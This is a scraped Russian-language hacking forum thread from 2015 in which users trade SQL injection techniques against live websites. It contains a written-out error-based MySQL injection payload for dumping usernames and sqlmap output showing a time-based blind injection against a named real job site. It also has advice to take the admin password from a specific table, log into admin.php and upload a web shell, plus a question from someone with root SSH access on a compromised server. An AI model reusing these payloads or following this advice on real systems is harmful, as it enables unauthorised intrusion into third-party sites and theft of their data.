ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.10.2015, 13:16
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от kacergei
kacergei said:
↑
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел
Как узнать путь?
Доп. Информация:
http://pastebin.com/ppPSZ4FH
P.S>Ошибок не выводит на сайте конфиги веб сервера
|
|
|
11.10.2015, 15:01
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от yarbabin
yarbabin said:
↑
конфиги веб сервера Перепробывал различные пути (почти все) с прикрепленной темы тут на форуме ( Default *log, *conf files locations), так же на rdot'e смотрел, а может быть такое что с локалки тянуться файлы?
|
|
|
|
11.10.2015, 18:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
61136
Репутация:
32
|
|
Кручу error-based руками
Такой запрос возвращает данные из колонки username
Код:
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
Можно вывести сразу id, username ? |
|
|
|
11.10.2015, 18:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
19071
Репутация:
10
|
|
Код:
Code:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Код:
Code:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE |
|
|
|
11.10.2015, 18:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от WallHack
WallHack said:
↑
Кручу error-based руками
Такой запрос возвращает данные из колонки username
Код:
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
Можно вывести сразу id, username ? select id,0x3a,username from users limit 0,1
|
|
|
|
11.10.2015, 19:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
61136
Репутация:
32
|
|
Сообщение от MaxFast
MaxFast said:
↑
select id,0x3a,username from users limit 0,1 Выводит: Operand should contain 1 column(s)
Код:
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
|
|
|
|
11.10.2015, 20:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от WallHack
WallHack said:
↑
Выводит: Operand should contain 1 column(s)
Код:
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
объедините в concat
|
|
|
|
11.10.2015, 20:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от Waki
Waki said:
↑
Код:
Code:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Код:
Code:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php
|
|
|
|
11.10.2015, 21:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
19071
Репутация:
10
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.
|
|
|
|
12.10.2015, 04:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от Waki
Waki said:
↑
спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию. все стандартно, методом перебора интересных названий таблиц. Только скулю другую нашел, с выводом
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
